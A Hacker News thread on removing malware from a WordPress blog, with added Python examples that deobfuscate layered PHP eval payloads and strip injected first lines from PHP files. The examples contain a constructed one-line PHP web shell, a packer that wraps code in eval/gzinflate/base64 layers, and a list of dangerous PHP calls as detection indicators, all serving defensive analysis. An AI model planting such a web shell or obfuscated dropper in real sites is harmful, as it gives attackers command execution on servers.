

Removing malware from a Wordpress blog - Case study - j_lagof
http://blog.sucuri.net/2010/02/removing-malware-from-wordpress-blog.html

======
qeorge
FWIW, this blog was running WP 2.8, which is about 6 months old. Current is
2.9.1. Upgrading is trivial.

If you're not keeping Wordpress updated expect this to happen to your blog
too.

------
wingo
Replacing eval with alert/echo is a nice technique, one I hadn't thought of.

Thankfully I haven't had to think of it in years; their conclusions
(basically, more logging and keeping up-to-date) would be valid if it weren't
Wordpress itself which is usually the attack vector. It's better to use
something else entirely.
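
The "replace eval with echo" trick above, done statically as an added example (this is not code from the Sucuri post, from WordPress, or from the commenter). Instead of editing the file and re-running it under PHP, the script below peels off one `eval(decoders('literal'))` wrapper at a time, which is exactly what `echo` would have printed, and repeats until the text is no longer a single `eval` statement. The sample payload and its wrapping are constructed here; the `eval(gzinflate(base64_decode(...)))` layering is a common pattern, but the payload itself is invented, and the function names `unpack`, `pack` and `indicators` are this example's own.

```python
"""Static 'eval -> echo' unpacking of layered PHP obfuscation.

Added example, not code from the Sucuri post or from WordPress. It does
offline what replacing eval() with echo and re-running the file does by
hand: decode one layer, look at the result, repeat. The sample payload
and its wrapping are constructed below.
"""
import base64
import codecs
import re
import zlib

# One obfuscation layer: optional <?php, then eval( f1( f2( 'literal' ) ) );
LAYER_RE = re.compile(
    r"""^\s*(?:<\?php\s*)?eval\s*\(\s*((?:\w+\s*\(\s*)+)(['"])(.*?)\2\s*\)+\s*;?\s*(?:\?>)?\s*$""",
    re.S,
)

# PHP decoder functions seen in such wrappers, as byte transforms.
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),   # raw DEFLATE, like PHP gzinflate()
    "gzuncompress": zlib.decompress,                   # zlib-wrapped, like PHP gzuncompress()
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}

# Calls worth a second look once the final layer is readable.
INDICATORS = ("system", "shell_exec", "passthru", "exec", "popen",
              "curl_exec", "fsockopen", "file_put_contents", "mail")


def unpack(code: str, max_layers: int = 32) -> list:
    """Return [original, layer1, ..., final] by decoding eval() wrappers
    from the outside in. Stops when the current text is no longer a
    single eval(decoders('literal')) statement, or at max_layers (a
    guard against runaway samples)."""
    layers = [code]
    for _ in range(max_layers):
        m = LAYER_RE.match(layers[-1])
        if not m:
            break
        funcs = re.findall(r"\w+", m.group(1))    # outermost first
        data = m.group(3).encode("latin-1")       # the string literal as bytes
        for fn in reversed(funcs):                # PHP evaluates innermost first
            if fn not in DECODERS:
                raise ValueError(f"unsupported decoder in wrapper: {fn}()")
            data = DECODERS[fn](data)
        layers.append(data.decode("latin-1"))
    return layers


def indicators(php: str) -> list:
    """Names from INDICATORS that appear as calls in the given PHP text."""
    return [n for n in INDICATORS if re.search(r"\b" + n + r"\s*\(", php)]


def pack(payload: bytes, layers: int) -> str:
    """Constructed sample generator: wrap payload in `layers` rounds of
    eval(gzinflate(base64_decode('...'))), the way such droppers do."""
    code = payload
    for _ in range(layers):
        comp = zlib.compressobj(wbits=-15)        # raw DEFLATE for gzinflate()
        deflated = comp.compress(code) + comp.flush()
        code = (b"<?php eval(gzinflate(base64_decode('"
                + base64.b64encode(deflated) + b"')));")
    return code.decode("latin-1")


# Constructed sample: a tiny web shell wrapped twice.
PAYLOAD = "<?php if (isset($_POST['c'])) { system($_POST['c']); } ?>"
SAMPLE = pack(PAYLOAD.encode("latin-1"), 2)

if __name__ == "__main__":
    for i, layer in enumerate(unpack(SAMPLE)):
        print(f"--- layer {i} ({len(layer)} bytes) ---")
        print(layer[:120])
    print("indicators:", indicators(unpack(SAMPLE)[-1]))
```

The decoders are applied in the order PHP would evaluate them (innermost call first), and anything the table does not know raises rather than silently skipping a layer, since a wrong decode order produces garbage that looks like "more obfuscation". Unknown decoders are the usual reason this stalls; add them to the table rather than guessing.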

~~~
skolor
I'm not convinced that using Wordpress is what directly caused this. From the
article, this was a "quite popular website". If someone from, say, Google, got
a keylogger on their computer, especially one that directly faces the
internet, I would be considerably more inclined to assume it was a targeted
attack, rather than just a random infection.

Just telling someone to use something else doesn't help at all. Telling a user
to stop using Windows because they get infected often may help if they were
simply downloading stuff they shouldn't, but if they were actually being
attacked, moving to Linux, since they will know much less about keeping it
even remotely secure, would lead to a potentially far more dangerous
infection.

------
pvg
It really says something about Wordpress that it has its own ecosystem of
malware, like an OS or browser. Except unlike an OS or browser, it just does
blogs. The sensible solution is probably what people get told when they use a
browser with a poor security record - 'don't use that'.

------
kvs
Wouldn't it make sense to let Wordpress host your blog? Lately there seems to
be one too many security updates for Wordpress. Why let the customer distract
themselves with Wordpress upgrades, etc.? Was the cost-benefit of this looked
into during this removal?

------
callmeed
I've had this happen to 3 customers. I read somewhere that the cause could be
a compromised FTP password found via malware on the user's PC.

~~~
CWuestefeld
I found a similar problem on one of my own hobby sites. I don't think the
problem was with a compromised PC, but with a bug in an old version of
WordPress. IIRC, there was a weakness with WebDAV that provided a back door.

Anyway, the solution was both more obvious and easier to fix than this article
describes. Every PHP file had a line injected at the very top. It was simply a
matter of stripping this extra line from each of several hundred lines -- a
little time consuming, but not a big deal.
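
The cleanup CWuestefeld describes, as an added example (not the commenter's own script and not from the article): find every PHP file under the site root whose first line looks like an injected `eval(...)` one-liner, confirm all the flagged lines are identical, strip that line and keep a backup. The directory tree, the injected line and the legitimate file body are constructed here; `INJECTED_RE` is a heuristic and should be tightened to the exact line found on the site before `clean()` is run for real.

```python
"""Find and strip a line injected at the top of every PHP file in a tree.

Added example, not code from the article or from the commenter. It
assumes the infection described above: one line prepended to each PHP
file, before the file's real content. The sample tree, the legitimate
file body and the injected line are all constructed below.
"""
import base64
import re
import tempfile
from pathlib import Path
from typing import Dict, Optional

# Heuristic for an injected first line: a one-line PHP block that runs
# eval()/assert()/preg_replace() over base64/gzinflate/rot13/chr() data.
INJECTED_RE = re.compile(
    rb"^<\?php\s.*\b(?:eval|assert|preg_replace)\s*\(.*"
    rb"(?:base64_decode|gzinflate|str_rot13|chr\s*\().*\?>\s*$"
)

# Constructed sample: the injected line and an innocuous theme file.
INJECTED_LINE = (b'<?php eval(base64_decode("'
                 + base64.b64encode(b"echo 'injected';") + b'")); ?>\n')
LEGIT = b"<?php\n/* legitimate theme code */\necho 'ok';\n"


def injected_first_line(path: Path) -> Optional[bytes]:
    """The raw first line (newline included) if it looks injected, else None."""
    with path.open("rb") as f:
        first = f.readline()
    return first if INJECTED_RE.match(first.rstrip(b"\r\n")) else None


def scan(root: Path) -> Dict[Path, bytes]:
    """Map each flagged .php file under root to its injected line."""
    found = {}
    for p in sorted(root.rglob("*.php")):
        line = injected_first_line(p)
        if line is not None:
            found[p] = line
    return found


def clean(root: Path, backup_suffix: str = ".infected") -> int:
    """Strip the injected first line from every flagged file, keeping a
    byte-for-byte backup beside it. Refuses to act if the flagged lines
    are not all identical: a mixed set means the heuristic is matching
    something it should not, so look before stripping."""
    found = scan(root)
    if len(set(found.values())) > 1:
        raise RuntimeError("flagged first lines differ; inspect before cleaning")
    for p, line in found.items():
        data = p.read_bytes()
        p.with_name(p.name + backup_suffix).write_bytes(data)
        p.write_bytes(data[len(line):])
    return len(found)


def build_sample() -> Path:
    """Constructed site tree: three infected files and one clean file."""
    root = Path(tempfile.mkdtemp(prefix="wp-"))
    (root / "wp-content" / "themes" / "x").mkdir(parents=True)
    for rel in ("index.php", "wp-config.php", "wp-content/themes/x/header.php"):
        (root / rel).write_bytes(INJECTED_LINE + LEGIT)
    (root / "wp-content" / "clean.php").write_bytes(LEGIT)
    return root


if __name__ == "__main__":
    root = build_sample()
    for p, line in scan(root).items():
        print(f"{p.relative_to(root)}: {line.rstrip().decode('latin-1')[:60]}")
    print(f"cleaned {clean(root)} file(s); re-scan finds {len(scan(root))}")
```

Stripping the line removes the payload, not the hole it came through: after a run like this the site still needs the WordPress upgrade and the FTP and database password changes, and a re-scan a day later tells you whether the injection is coming back.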

